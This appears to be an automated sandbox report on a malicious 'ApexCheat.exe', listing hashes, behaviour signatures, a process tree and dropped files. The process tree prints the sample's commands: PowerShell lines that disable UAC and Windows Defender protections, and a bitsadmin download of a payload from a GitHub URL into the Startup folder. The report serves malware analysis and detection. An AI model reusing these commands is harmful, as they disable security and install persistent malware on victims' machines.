Analysis

  • max time kernel
    188s
  • max time network
    185s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15/05/2023, 12:29

General

  • Target

    ApexCheat.exe

  • Size

    185KB

  • MD5

    3363959a51d54564d3d0095aa781159b

  • SHA1

    5244bb0bb3f4f9e4bcda5ed9ae3d67433734dabc

  • SHA256

    fda539d05ff1a17dd396d4ec69248e1f4f3cd6104dc746fe2895001320e5815f

  • SHA512

    88819e8dfc285d1089df4552e356fb5b1d0dabe5c5776924e6abd0017abda2943e8d4529a28518758a32912277e818c536323a0410dffba69f3477d36d56a984

  • SSDEEP

    3072:Vq6+ouCpk2mpcWJ0r+QNTBfQLXb9Gmk6Rgge+:Vldk1cWQRNTBILXb97rz

Score
10/10

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ApexCheat.exe
    "C:\Users\Admin\AppData\Local\Temp\ApexCheat.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3240
    • C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6314.tmp\6315.tmp\6326.bat C:\Users\Admin\AppData\Local\Temp\ApexCheat.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
        3⤵
        • UAC bypass
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Set-MpPreference -PUAProtection disable"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3236
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /transfer Packages /download /priority foreground https://github.com/sahdow3256/Test/raw/main/services.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winupdate.exe"
        3⤵
        • Download via BitsAdmin
        PID:804
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2780
    • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\These.docx" /o ""
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:4680
    • C:\Windows\system32\WFS.exe
      "C:\Windows\system32\WFS.exe"
      1⤵
      • Drops desktop.ini file(s)
      • NTFS ADS
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      PID:3092
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3776
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffd3ed39758,0x7ffd3ed39768,0x7ffd3ed39778
        2⤵
          PID:4124
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
          2⤵
            PID:4296
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:2
            2⤵
              PID:3396
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
              2⤵
                PID:4352
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:1
                2⤵
                  PID:4992
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:1
                  2⤵
                    PID:4984
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4388 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:1
                    2⤵
                      PID:2208
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4536 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
                      2⤵
                        PID:1520
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4684 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
                        2⤵
                          PID:3560
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4876 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:1
                          2⤵
                            PID:3380
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
                            2⤵
                              PID:2576
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
                              2⤵
                                PID:864
                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
                                2⤵
                                  PID:3752
                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x24c,0x250,0x254,0x74,0x258,0x7ff7ef1f7688,0x7ff7ef1f7698,0x7ff7ef1f76a8
                                    3⤵
                                      PID:4420
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5328 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:1
                                    2⤵
                                      PID:1848
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
                                      2⤵
                                        PID:3724
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1708,i,3078831390203590225,15601551195759418849,131072 /prefetch:8
                                        2⤵
                                          PID:3764
                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                        1⤵
                                          PID:1760
                                        • C:\Windows\system32\taskmgr.exe
                                          "C:\Windows\system32\taskmgr.exe" /7
                                          1⤵
                                          • Drops file in Windows directory
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:4900
                                        • C:\Windows\system32\OpenWith.exe
                                          C:\Windows\system32\OpenWith.exe -Embedding
                                          1⤵
                                          • Modifies registry class
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4824

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Program Files\Google\Chrome\Application\SetupMetrics\20230515143149.pma

                                          Filesize

                                          488B

                                          MD5

                                          6d971ce11af4a6a93a4311841da1a178

                                          SHA1

                                          cbfdbc9b184f340cbad764abc4d8a31b9c250176

                                          SHA256

                                          338ddefb963d5042cae01de7b87ac40f4d78d1bfa2014ff774036f4bc7486783

                                          SHA512

                                          c58b59b9677f70a5bb5efd0ecbf59d2ac21cbc52e661980241d3be33663825e2a7a77adafbcec195e1d9d89d05b9ccb5e5be1a201f92cb1c1f54c258af16e29f

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                          Filesize

                                          528B

                                          MD5

                                          460abbfc8159cfff6cf7efd727584c46

                                          SHA1

                                          6ad455680d027fd01c439a6b0092b8c4e9682162

                                          SHA256

                                          5464b7ee90a0043ae6bc0c05f35700942f6b56577a43ba0d2106ec72e61956fe

                                          SHA512

                                          7b4c09bb45a7712ddfb1e02f116eae801dd4099441845c4c4a3489db16aa345d75470a305fcd2f0337db83f9ae73f5b7c573b8aa266a66f5fc1d0ad4443073cf

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                          Filesize

                                          624B

                                          MD5

                                          088ab6b2230f06125e4eefe86379f44c

                                          SHA1

                                          3fcc6ab484a54b6ead0c8a9eeff699f630dcdf53

                                          SHA256

                                          0d22baa568783b8cdbe86f387c09118f56a1c9c4ad688cf343e92bb5fa00ad9c

                                          SHA512

                                          5c6583d1d3f1434db3b95167c8ca9c53a1c10c52be6d0217131e640f0110910be405396640064dabdf240cce17ee53faced7c26aa7b5df947413bd851ff58d3c

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                          Filesize

                                          2KB

                                          MD5

                                          cd30f1079524f230107714f6c0486009

                                          SHA1

                                          ee421b5f7ed5a12eceaf68c61dbe91bdb4c843b5

                                          SHA256

                                          5d65e1873e75d086247ecc305df55c8f108d9776a270970ab83241e303d1e153

                                          SHA512

                                          d34e2c34a5588ab39cf8c010b63697318f609c4280cf93f61b61ce15321f10b379fe68e92102c18c1f7b38ff4ccc1986ec2a14d5ab5ed17b1a0d71bde4d748e9

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                          Filesize

                                          539B

                                          MD5

                                          e40721cc921cd6bf27ef9f88003012c1

                                          SHA1

                                          8ed8e2f3e3462533f452ff0a807b25f431228512

                                          SHA256

                                          4f704c6ceb14f7b8c456cd73cac77b0314915cdc65afeeef0c935fe1d8e47313

                                          SHA512

                                          5ba99c5874f0093296027d619707b665589a48549c9f55105f770f4fddcd70998e760ea1cf5414dfea6a761936fe67dcbe314e9194fd4a8c85c6a66cde98cf1f

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                          Filesize

                                          539B

                                          MD5

                                          efb672f890186a5b3e52bd38346cbe5a

                                          SHA1

                                          e63f7b3a85f06bd46d9335d6fd9fe4ef4add04fe

                                          SHA256

                                          1a562d4e2c7e71ef064e3141a41c69c189e1bb0ec9a366b19f1bf11f9623f6a9

                                          SHA512

                                          115daa4ddf221988d39adfd31677a6274c5b5c14b0ed64e812be4b71c79161fe4b03ac9d9feeac4b11a6d051009062dd8b034519ee8dd2411d7033e72bb91685

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                          Filesize

                                          539B

                                          MD5

                                          b4007aedd9556b13cfaed83eabe9aae0

                                          SHA1

                                          3aaf892931fade2a97d1842d1b6d431c868894a9

                                          SHA256

                                          a27559e663d62e3f9f5a304694174cac40ef3cc700d28b506bda53e7eb242a6a

                                          SHA512

                                          8962c3156b13e6bf54fd430a8b3e9be1a0cfdb285793c62b25667567ec8483cac00012d90229f1567d7e79325e99320601a291f1794d34c8aa12ee925ab37a54

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                          Filesize

                                          539B

                                          MD5

                                          3757fbbc7b16b3287f75216a22082610

                                          SHA1

                                          d96d6da30a228e33e1e9603e7ba1ef937ec979f5

                                          SHA256

                                          f18aa1ac90e0612e083c9a03d855129c66e28c8c225cee8ed80d2296563b8478

                                          SHA512

                                          2f268313dd3301b43f18c6bb721a24f7acd4a328b6a334775857869c1708d7c919f56d667c3de6676f0b27fd04b04b13c20a2f51e387704a22b60bb46f771907

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          5KB

                                          MD5

                                          c107b200796f5f6775f09727ce056935

                                          SHA1

                                          a03259193770d9a659f7b53d20e9d0c9a02206ae

                                          SHA256

                                          6d0526fc792545442eddc1f8f93ecf679ccc4331c70d742af13133ae89facbca

                                          SHA512

                                          1a67a8155550a13b0f9c9ca29aa1e70a954fb92b86e32272ed729f4bade1d51905bd6d56e98b3c67eafb0b9bcf302ada5b626ff0707b670817b4875daebc9cd4

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          6KB

                                          MD5

                                          1503d2061e12dcbfe5756673a172c22b

                                          SHA1

                                          82e24026ebf967373f9d3b233141e559e561f80f

                                          SHA256

                                          d1f9e56f4f9f331c838076545e4fe6173764c5e60c1d12bbacda31b0ffbe71e9

                                          SHA512

                                          ffb5f7b3440458a007a56b4aaa9c5959934e25d1555dab803f3e1c79f181be6ed5d0d12de03d9ed7e5259ffffb9719f58c177973a65cf75ccde9e10d5502feaf

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          6KB

                                          MD5

                                          e2fcbf84e935cfe47a1a3595b5dc7255

                                          SHA1

                                          a2e28f6b2da47f93b3e4ce46e2d74bb4bef9b57b

                                          SHA256

                                          cd11051c6d3f5d9b9abf10a158b297f589ce7293a094662062d33999fed6a0a9

                                          SHA512

                                          d7386b0f4fa596db0b9aeb152750656e76d35fbaae288f3ef21c70227cdfd50c9bfbe54fc9f748043c9d4a698f16ce7971c7c97d0cdb506fd4c578b8f54cd96d

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          6KB

                                          MD5

                                          73715d2b482ab2354a481bd3b816f46f

                                          SHA1

                                          9a75565aa960b2da3b6727ed04c3ea07b2bcb559

                                          SHA256

                                          0564e527b2256bcf79f2d929907eed0750abca3fae52a4a084db822e4f2fcc3f

                                          SHA512

                                          379652ddb093bd1fb92cf3347753b36a281981cf450b5e7dbf37b3ce924510cbe936bdbf3f5498b92d3de91a6f29530bb28f4d19d32f32a6abdf752ecac2cd77

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          152KB

                                          MD5

                                          f3c4ee40fe357f449d5cd776280d9a95

                                          SHA1

                                          7eedee989ea98f6cf0a3d15a48cc8d1018413578

                                          SHA256

                                          021aec73fe3063f5116505eaadfc9ad087b861369cd9c325e7b6a65e850d662c

                                          SHA512

                                          8d2c7acc5229a7cc71c1a2cd640faa65dd9ede69849c9bb78971fefb12be0eca16736140dd0192ab2b726366c992a5fa1e8a1fd242232d37c06b1171572ab5e9

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          153KB

                                          MD5

                                          7d6e96ccf1bea2c5f4bf74d56c6aa2b5

                                          SHA1

                                          17535297bd7042315e8bf65fd894e728387d1c2f

                                          SHA256

                                          dc34be3606a69deae822a6dabb6142766738f3da95d23636995c293b41a6580a

                                          SHA512

                                          0402fba8a8ff3fc38af8122059440b84435f32ec3ebec1d759869f1b84e7208d8ca6052057d34fd35487f0978fb4fd146d3762a2f433737dac38576c11410e9a

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          72KB

                                          MD5

                                          e9e56e6981c89be8bd483753c036069e

                                          SHA1

                                          3eb4fb0572075e7bc84ee09d00c7b60c973ac2a7

                                          SHA256

                                          609d92d15d319adf8ad4b09ac020a4d236f3eb64a7b9d66e295dd7f04a64660e

                                          SHA512

                                          719a4aa0eb82dc1fd133463ab1acd53ff288a2513afd0cc90c9a730e6ba8e8039eaf6332de6b2003b691d4acee9b35b03a43ca78dea19c9887f0ae8ff3a34598

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          153KB

                                          MD5

                                          ec49689fcffdbc86b5a16f0062e08ca5

                                          SHA1

                                          6ac6471eab1f9d9cc31763b597a1fb87c19ee7aa

                                          SHA256

                                          99d3a60750a5b769a47f3362f54370e4a2a2e8ac80320c4d6ca9182b8f0d16ff

                                          SHA512

                                          043d4ab37db600d905b5dd500bacfcf3c235d51219e5f564972a940fd070fc8a65a74847959367593b681a8b918adf9bce4c64bf3d7aae61f6f7255cc1c76385

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                          Filesize

                                          2B

                                          MD5

                                          99914b932bd37a50b983c5e7c90ae93b

                                          SHA1

                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                          SHA256

                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                          SHA512

                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          3KB

                                          MD5

                                          8592ba100a78835a6b94d5949e13dfc1

                                          SHA1

                                          63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                          SHA256

                                          fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                          SHA512

                                          87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          1440c2bec77e94284406a5bdf457be0e

                                          SHA1

                                          bc0f190637e2e2e25803777cf6a4163f5c92df8e

                                          SHA256

                                          1ba107de313e6e3e535879c90d1af4f0b69f768a6154159c403aa4c0c65e9f8a

                                          SHA512

                                          8367025e27a2cd7d2ee7c820e07a1281630dcb3207956bbdb4e6c492485e89066211b1a1b716e7ad1c3fd9f2d68149b48e971f6ebcfe94349f56742eb8fcc556

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          27b70e3dc14eb560948d93fd02febb68

                                          SHA1

                                          b135d6cff221708abc998950ab324bbf869b2545

                                          SHA256

                                          259c1b08365b7679126158941cd659772f48a00c491acaf90f0e7a025449c4e0

                                          SHA512

                                          bac8f873b52da59a73598ef6f9693d7beb9fc2e4d62811c60286599d891efad2a8bbea6aba7740f6f59cc0d01c074d55754ff5063defb77699cb02acdd533019

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          754bcff3851b6bb7b5a958482f0dd419

                                          SHA1

                                          cd5661ad1c8f6620db48462ce2ef9e94810505d8

                                          SHA256

                                          4f244e96e40807f92282b9ed9a58060d4da3cd18cbed60647d6eda5deb0b9bb5

                                          SHA512

                                          0b875dd1174d4cd92fd8edbb344250d2b1f995abbae97ab69090a92e55f5f965ea0c259d049393cad441d027c4664e114078ca43900451449a41b1053b3dec62

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          1572016f4161c83addfde2a439d58a23

                                          SHA1

                                          c122aa5e768d0c550111461b9236d8b158bb5421

                                          SHA256

                                          b3744950b314fd4fb575086d8b8b7ce660e5a050bf125a1050b669dc9e95e0fe

                                          SHA512

                                          520a70f407ed82188a3614db54f7c5f38cf59214b147b7b4d1d5bd499669f40f8d91fb0920ef178dc5daea00092c583878d282e401c56c59bd4b6d0371705bf6

                                        • C:\Users\Admin\AppData\Local\Temp\6314.tmp\6315.tmp\6326.bat

                                          Filesize

                                          888B

                                          MD5

                                          9549c655ae1b14b31a042412384d70d8

                                          SHA1

                                          8c4079bb5b751a5b2a9a53a0a5b8a868251bde06

                                          SHA256

                                          f33f1b4ae6854a69ce6bac61f037d4ba747c0a1867312a70df671b9dddc288d9

                                          SHA512

                                          34f88c397f1fed91da52bbb0e38badee48cf796b98e7a3ce3c8b5beb2d02dd6531e26acc903ce66978f64417be9d08989ee5ec9170319149c3a89499c0c813a4

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c0msnveb.n3g.ps1

                                          Filesize

                                          1B

                                          MD5

                                          c4ca4238a0b923820dcc509a6f75849b

                                          SHA1

                                          356a192b7913b04c54574d18c28d46e6395428ab

                                          SHA256

                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                          SHA512

                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                          Filesize

                                          224B

                                          MD5

                                          e66d36cbcfd69fdf8db6e5c649137ef1

                                          SHA1

                                          c1ce08cca33347fe58f95f78f61c31ac6501f511

                                          SHA256

                                          15376656ff62df570727bcac73caf451fbe0599729bb4bf648b5e65b3e97f5f4

                                          SHA512

                                          78a8c44885ce2f1a035a3075a50027d6eff5c1adbc4d4d134880b1aced5e5d0f70fb6ca8cb037327ec4890a392b3be84eb85c72f38d4cfac985afab64b7c81bc

                                        • C:\Users\Admin\Documents\Scanned Documents\Welcome Scan.jpg

                                          Filesize

                                          504KB

                                          MD5

                                          73d4281e46a68222934403627e5b4e19

                                          SHA1

                                          0f1c29cea7ea24ebb75c95114e0b0d26438e1d39

                                          SHA256

                                          aac4ac970ec47cd95dc7c65d7d38d29c1f948be24d5dad1d5aa21053125367c7

                                          SHA512

                                          bb7aad10e5accd3f5c0f6b2968973034a2f7c2523401eb234b2de0cdad2dc13f4fd58d08ece94ec06420a52b3d371ba832f8fb4741f48799703bdf32a4daf555

                                        • memory/1976-243-0x000001D7687F0000-0x000001D768800000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1976-336-0x000001D7687F0000-0x000001D768800000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1976-200-0x000001D7687F0000-0x000001D768800000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1976-202-0x000001D7687F0000-0x000001D768800000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/1976-241-0x000001D7687F0000-0x000001D768800000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3236-314-0x000001AE7F750000-0x000001AE7F760000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3236-315-0x000001AE7F750000-0x000001AE7F760000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3236-311-0x000001AE7F750000-0x000001AE7F760000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3412-289-0x000001D6E4170000-0x000001D6E4180000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3412-287-0x000001D6E4170000-0x000001D6E4180000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3412-288-0x000001D6E4170000-0x000001D6E4180000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4068-126-0x00000197E6DD0000-0x00000197E6DF2000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/4068-129-0x00000197E6E80000-0x00000197E6E90000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4068-130-0x00000197E7090000-0x00000197E7106000-memory.dmp

                                          Filesize

                                          472KB

                                        • memory/4068-163-0x00000197E6E80000-0x00000197E6E90000-memory.dmp

                                          Filesize
